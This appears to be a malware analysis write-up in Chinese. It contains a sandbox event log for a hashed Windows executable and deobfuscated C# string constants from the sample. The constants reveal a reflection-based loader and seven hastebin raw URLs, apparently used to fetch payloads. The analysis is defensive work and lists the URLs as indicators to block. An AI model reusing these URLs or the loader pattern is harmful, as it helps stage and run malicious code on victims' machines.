datalen:0x00001000 , 0x00000000 [操作成功完成。 ], 09:07:44:705, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:44:705, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:44:705, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:44:721, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Users\bonelee\Desktop\99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, offset:0x00000000 datalen:0x00001000 , 0x00000000 [操作成功完成。 ], 09:07:44:861, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:0, 4092, PROC_exec, C:\Windows\SysWOW64\WerFault.exe, target_pid:8492 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 1904' , 0x00000000 [操作成功完成。 ], 09:07:44:861, WerFault.exe, 8492:0, 4092, EXEC_create, C:\Windows\SysWOW64\WerFault.exe, parent_pid:4092 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 1904' image_base:0x0000000000A90000 image_size:0x0006F000 , 0x00000000 [操作成功完成。 ], 09:07:44:940, WerFault.exe, 8492:8588, 4092, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp, access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:07:44:940, WerFault.exe, 8492:8588, 4092, FILE_read, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:07:44:940, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp, , 0x00000000 
[操作成功完成。 ], 09:07:44:940, WerFault.exe, 8492:8588, 4092, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp, access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:07:44:940, WerFault.exe, 8492:8588, 4092, FILE_read, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:07:44:940, WerFault.exe, 8492:8588, 4092, FILE_truncate, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp, eof:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:45:112, WerFault.exe, 8492:8588, 4092, FILE_write, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp, offset:0x00000000 datalen:0x00000020 , 0x00000000 [操作成功完成。 ], 09:07:45:144, WerFault.exe, 8492:8588, 4092, FILE_read, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:07:45:144, WerFault.exe, 8492:0, 4092, FILE_modified, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp, , 0x00000000 [操作成功完成。 ], 09:07:45:144, WerFault.exe, 8492:8588, 4092, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp, access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:07:45:144, WerFault.exe, 8492:8588, 4092, FILE_read, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:07:45:144, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp, , 0x00000000 [操作成功完成。 ], 09:07:45:144, WerFault.exe, 8492:8588, 4092, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml, access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000001 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:07:45:144, WerFault.exe, 8492:8588, 4092, FILE_write, 
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:07:45:158, WerFault.exe, 8492:0, 4092, EXEC_module_load, C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51\comctl32.dll, base:0x0000000070060000 size:0x0020F000 , 0x00000000 [操作成功完成。 ], 09:07:45:158, WerFault.exe, 8492:8588, 4092, FILE_readdir, C:\Windows\SysWOW64\drivers, filter:'*.mrk' , 0x00000000 [操作成功完成。 ], 09:07:45:158, WerFault.exe, 8492:8588, 4092, FILE_read, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:07:45:158, WerFault.exe, 8492:0, 4092, FILE_modified, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml, , 0x00000000 [操作成功完成。 ], 09:07:45:158, WerFault.exe, 8492:8588, 4092, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:45:158, WerFault.exe, 8492:8588, 4092, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:45:158, WerFault.exe, 8492:8588, 4092, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:45:158, WerFault.exe, 8492:8588, 4092, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:45:174, WerFault.exe, 8492:8588, 4092, FILE_readdir, C:\Windows\SysWOW64\drivers, filter:'*.mrk' , 0x00000000 [操作成功完成。 ], 09:07:45:174, WerFault.exe, 8492:8588, 4092, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp, access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:07:45:174, WerFault.exe, 8492:8588, 4092, FILE_read, 
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:07:45:174, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp, , 0x00000000 [操作成功完成。 ], 09:07:45:174, WerFault.exe, 8492:8588, 4092, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml, access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:07:45:174, WerFault.exe, 8492:8588, 4092, FILE_write, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml, offset:0x00000000 datalen:0x00001306 , 0x00000000 [操作成功完成。 ], 09:07:45:174, WerFault.exe, 8492:8588, 4092, FILE_read, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:07:45:174, WerFault.exe, 8492:0, 4092, FILE_modified, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml, , 0x00000000 [操作成功完成。 ], 09:07:45:221, WerFault.exe, 8492:6220, 4092, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:45:221, WerFault.exe, 8492:6220, 4092, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:45:221, WerFault.exe, 8492:6220, 4092, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:45:221, WerFault.exe, 8492:6220, 4092, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:45:221, WerFault.exe, 8492:8024, 4092, REG_mkkey, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData, access:0x0002001B , 0x00000000 [操作成功完成。 ], 09:07:45:221, WerFault.exe, 8492:8024, 4092, REG_setval, 
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData\ClockTimeSeconds, type:0x0000000B datalen:8 data:'61 96 EE 64 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:07:45:221, WerFault.exe, 8492:8024, 4092, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData\TickCount, type:0x0000000B datalen:8 data:'0C 8F 01 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:07:45:237, WerFault.exe, 8492:6220, 4092, FILE_readdir, C:\Windows\SysWOW64\drivers, filter:'*.mrk' , 0x00000000 [操作成功完成。 ], 09:07:45:361, WerFault.exe, 8492:8024, 4092, NET_connect, 52.168.117.173:443, protocol:(TCP)0 , 0x00000000 [操作成功完成。 ], 09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp, , 0x00000000 [操作成功完成。 ], 09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml, , 0x00000000 [操作成功完成。 ], 09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml, , 0x00000000 [操作成功完成。 ], 09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDD.tmp.csv, , 0x00000000 [操作成功完成。 ], 09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EFD.tmp.txt, , 0x00000000 [操作成功完成。 ], 09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportQueue, filter:'*_*_*_*_*' , 0x00000000 [操作成功完成。 ], 09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0, access:0x00100001 alloc_size:0 attrib:0x00000080 share_access:0x00000003 disposition:0x00000002 options:0x00200021 , 0x00000000 [操作成功完成。 ], 09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_read, 
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:07:46:408, WerFault.exe, 8492:8588, 4092, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0\Report.wer, access:0x00120196 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000005 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:07:46:408, WerFault.exe, 8492:8588, 4092, FILE_chmod, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0\Report.wer, attrib:0x00002080 , 0x00000000 [操作成功完成。 ], 09:07:46:408, WerFault.exe, 8492:8588, 4092, FILE_write, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0\Report.wer, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:07:46:408, WerFault.exe, 8492:8588, 4092, FILE_read, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0\Report.wer, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:07:46:408, WerFault.exe, 8492:0, 4092, FILE_modified, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0\Report.wer, , 0x00000000 [操作成功完成。 ], 09:07:46:424, WerFault.exe, 8492:0, 4092, EXEC_destroy, C:\Windows\SysWOW64\WerFault.exe, parent_pid:4092 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 1904' , 0x00000000 [操作成功完成。 ], 09:07:46:424, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:0, 4092, EXEC_destroy, C:\Users\bonelee\Desktop\99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, parent_pid:7920 
cmdline:'C:\Users\bonelee\Desktop\99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe' , 0x00000000 [操作成功完成。 ],
关键行为:
1、09:07:41:858, cmd.exe, 6308:0, 4092, EXEC_create, C:\Windows\SysWOW64\cmd.exe, parent_pid:4092 cmdline:'"C:\Windows\System32\cmd.exe" /c timeout 4.769' image_base:0x0000000000FE0000 image_size:0x00059000 , 0x00000000 [操作成功完成。 ],
2、09:07:41:952, timeout.exe, 8672:0, 4092, EXEC_create, C:\Windows\SysWOW64\timeout.exe, parent_pid:6308 cmdline:'timeout 4.769' image_base:0x0000000000020000 image_size:0x0000A000 , 0x00000000 [操作成功完成。 ],
3、WerFault.exe（Windows 错误报告，进程 8492，由样本进程 4092 崩溃触发）创建并随后删除了多个崩溃报告临时文件:
4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp, , 0x00000000 [操作成功完成。 ],
09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml, , 0x00000000 [操作成功完成。 ],
09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml, , 0x00000000 [操作成功完成。 ],
09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDD.tmp.csv, , 0x00000000 [操作成功完成。 ],
09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EFD.tmp.txt, , 0x00000000 [操作成功完成。 ],
看下其代码(已经反混淆):
// Token: 0x06000005 RID: 5 RVA: 0x00002052 File Offset: 0x00000252
// Decoded string constant "1769".
// The original builds every one of these strings character by character
// through string.Format so that no readable literal survives in the
// binary; each method below returns exactly the same value as the original.
public static string smethod_2()
{
    return "1769";
}

// Token: 0x06000006 RID: 6 RVA: 0x000025F4 File Offset: 0x000007F4
// Decoded: "cmd.exe" (matches the cmd.exe process seen in the sandbox log).
public static string smethod_3()
{
    return "cmd.exe";
}

// Token: 0x06000007 RID: 7 RVA: 0x0000264C File Offset: 0x0000084C
// Decoded: "Assembly". Together with "Load" and "EntryPoint" below this
// looks like a reflection-based loader resolving members by name;
// NOTE(review): confirm in the calling method, which is not shown here.
public static string smethod_4()
{
    return "Assembly";
}

// Token: 0x06000008 RID: 8 RVA: 0x00002084 File Offset: 0x00000284
// Decoded: "Load".
public static string smethod_5()
{
    return "Load";
}

// Token: 0x06000009 RID: 9 RVA: 0x000026AC File Offset: 0x000008AC
// Decoded: "EntryPoint".
public static string smethod_6()
{
    return "EntryPoint";
}

// Token: 0x0600000A RID: 10 RVA: 0x0000271C File Offset: 0x0000091C
// Decoded: seven hastebin "raw" URLs joined by the "@@@" separator
// (the same separator smethod_8 returns). 263 characters in total,
// identical to the original's 263-placeholder string.Format call.
// These URLs are indicators worth blocking/alerting on at the proxy.
public static string smethod_7()
{
    string[] urls =
    {
        "https://hastebin.com/raw/yonozilace",
        "https://hastebin.com/raw/uralapuvuh",
        "https://hastebin.com/raw/epukubaqub",
        "https://hastebin.com/raw/osajoroziw",
        "https://hastebin.com/raw/eqedocefex",
        "https://hastebin.com/raw/ajifuyijez",
        "https://hastebin.com/raw/esurijakad",
    };
    // No trailing separator: the original list ends with the last URL.
    return string.Join("@@@", urls);
}

// Token: 0x0600000B RID: 11 RVA: 0x000020B6 File Offset: 0x000002B6
// Decoded: "@@@", the delimiter between the URLs in smethod_7.
public static string smethod_8()
{
    return "@@@";
}
smethod_2: 返回字符串 "1769"
smethod_3: 返回字符串 "cmd.exe"
smethod_4: 返回字符串 "Assembly"
smethod_5: 返回字符串 "Load"
smethod_6: 返回字符串 "EntryPoint"
smethod_7: 返回一个非常长的字符串，按上面的代码还原后是多个形如 "https://hastebin.com/raw/..." 的 URL，以 "@@@" 分隔
smethod_8: 返回字符串 "@@@"（即 smethod_7 中各 URL 之间的分隔符）